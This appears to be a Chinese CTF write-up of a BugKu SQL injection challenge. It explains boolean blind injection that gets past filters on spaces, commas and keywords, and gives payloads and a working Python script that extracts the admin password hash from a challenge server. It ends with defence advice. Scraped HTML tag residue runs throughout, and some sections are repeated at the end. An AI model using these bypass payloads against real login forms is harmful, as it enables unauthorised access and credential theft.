SQL注入高级技巧：基于运算符的盲注与绕过<\/h1>

1. 题目背景分析<\/h2>
这是一道来自BugKu平台的SQL注入题目，分值200分，位于Web题目后段。虽然网上存在大量直接访问`\/flag<\/code>文件的解法，但作者认为这并非题目设计的初衷，而是存在正规的SQL注入解法。<\/p>`

2. 信息搜集阶段<\/h2>
2.1 文件探测<\/h3>

尝试访问.DS_Store<\/code>文件（Mac OS的隐藏文件），但未发现有用信息<\/li>
检查admin<\/code>目录，同样无果<\/li>
<\/ul>
2.3 错误信息分析<\/h3>

发现系统返回两种不同的错误：

username error<\/code><\/li>
password error<\/code><\/li>
<\/ul>
<\/li>
这提示可以进行基于布尔值的盲注（Boolean-based Blind SQLi）<\/li>
<\/ul>
3. SQL注入探测<\/h2>
3.1 过滤字符检测<\/h3>

系统会明确提示哪些字符被过滤<\/li>
发现以下字符\/功能被过滤：

空格<\/li>
or<\/code>, and<\/code>等关键词<\/li>
regexp<\/code>, like<\/code>等常用函数<\/li>
<\/ul>
<\/li>
<\/ul>
3.2 可用运算符<\/h3>

题目提示保留了!<\/code>和,<\/code>字符<\/li>
发现-<\/code>运算符可用且效果显著<\/li>
<\/ul>
3.3 注入原理<\/h3>
后台SQL语句可能形如：<\/p>
$sql =<\/span> "select * from users where username=<\/span>$username<\/span>"<\/span>;
<\/span><\/span><\/code><\/pre>利用字符串与数字运算时的类型转换：<\/p>

'admin'-1-''<\/code> → -1<\/code><\/li>
'admin'-0-''<\/code> → 0<\/code><\/li>
<\/ul>
当构造admin'-0-'<\/code>时：<\/p>

转换为0=0<\/code>（真）<\/li>
返回username error<\/code><\/li>
<\/ul>
构造admin'-1-'<\/code>时：<\/p>

转换为0=1<\/code>（假）<\/li>
返回password error<\/code><\/li>
<\/ul>
4. 注入语句构造<\/h2>
4.1 基本思路<\/h3>
需要构造类似以下语句：<\/p>
ascii(substr((select<\/span> database<\/span>()),1<\/span>,1<\/span>))>-<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>4.2 绕过限制的技术<\/h3>


没有逗号<\/strong>：使用from<\/code>语法替代<\/p>

传统方式：substr(str,1,1)<\/code><\/li>
替代方式：mid(str from 1 for 1)<\/code><\/li>
<\/ul>
<\/li>

没有空格<\/strong>：使用括号紧密连接<\/p>
<\/li>

字符串截取技巧<\/strong>：<\/p>

反向截取：mid((passwd)from(-1))<\/code> → 获取最后1个字符<\/li>
结合反转函数：REVERSE(MID((passwd)from(-pos)))<\/code><\/li>
<\/ul>
<\/li>

完整字符提取逻辑：<\/p>
mid(REVERSE(MID((passwd)from<\/span>(-<\/span>pos)))from<\/span>(-<\/span>1<\/span>))
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 自动化注入脚本<\/h2>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/120.24.86.145:8007\/web2\/login.php"<\/span>
<\/span><\/span>cookie =<\/span> {'PHPSESSID'<\/span>: 'i6f9opt690kralopas7lcj68ne9na6ev'<\/span>}
<\/span><\/span>password =<\/span> ""<\/span>
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(1<\/span>, 33<\/span>):
<\/span><\/span>    for<\/span> j in<\/span> '0123456789abcdef'<\/span>:
<\/span><\/span>        payload =<\/span> "admin'-(ascii(mid(REVERSE(MID((passwd)from(-"<\/span> +<\/span> str(i) +<\/span> ")))from(-1)))="<\/span> +<\/span> str(ord(j)) +<\/span> ")-'"<\/span>
<\/span><\/span>        data =<\/span> {'uname'<\/span>: payload, 'passwd'<\/span>: 'sky'<\/span>}
<\/span><\/span>        r =<\/span> requests.<\/span>post(url=<\/span>url, cookies=<\/span>cookie, data=<\/span>data)
<\/span><\/span>        if<\/span> "username error!!@_@"<\/span> in<\/span> r.<\/span>content:
<\/span><\/span>            password +=<\/span> j
<\/span><\/span>            print password
<\/span><\/span>            break<\/span>
<\/span><\/span><\/code><\/pre>6. 注入结果与后续利用<\/h2>

获取到密码的MD5哈希值<\/li>
解密后得到密码：admin123<\/code><\/li>
使用admin\/admin123<\/code>登录<\/li>
进入命令执行页面，通过ls<\/code>发现flag文件<\/li>
最终flag：flag{sql_iNJEct_comMon3600!}<\/code><\/li>
<\/ul>
7. 关键知识点总结<\/h2>

布尔盲注<\/strong>：利用不同的错误响应判断条件真假<\/li>
运算符利用<\/strong>：在过滤空格和关键词时，-<\/code>运算符的特殊作用<\/li>
字符串处理<\/strong>：

使用from<\/code>语法绕过逗号限制<\/li>
结合REVERSE<\/code>和MID<\/code>实现精确字符提取<\/li>
<\/ul>
<\/li>
类型转换<\/strong>：利用字符串与数字运算时的自动类型转换<\/li>
自动化<\/strong>：编写脚本高效完成数据提取<\/li>
<\/ol>
8. 防御建议<\/h2>

使用参数化查询或预处理语句<\/li>
实施严格的输入过滤和类型检查<\/li>
避免在错误信息中泄露过多细节<\/li>
对敏感操作实施多因素认证<\/li>
限制数据库用户的权限<\/li>
<\/ol>
9. 扩展思考<\/h2>

如果-<\/code>也被过滤，还可以尝试哪些运算符？<\/li>
如何在没有REVERSE<\/code>函数的情况下实现字符截取？<\/li>
在完全无错误回显的情况下，如何利用时间延迟进行注入？<\/li>
<\/ol>
这道题目展示了在严格过滤环境下进行SQL注入的高级技巧，强调了深入理解SQL语法和运算符特性的重要性。<\/p>

SQL注入高级技巧：基于运算符的盲注与绕过<\/h1>

1. 题目背景分析<\/h2> 这是一道来自BugKu平台的SQL注入题目，分值200分，位于Web题目后段。虽然网上存在大量直接访问\/flag<\/code>文件的解法，但作者认为这并非题目设计的初衷，而是存在正规的SQL注入解法。<\/p>

3. SQL注入探测<\/h2>

4. 注入语句构造<\/h2>

1. 题目背景分析<\/h2>
这是一道来自BugKu平台的SQL注入题目，分值200分，位于Web题目后段。虽然网上存在大量直接访问`\/flag<\/code>文件的解法，但作者认为这并非题目设计的初衷，而是存在正规的SQL注入解法。<\/p>`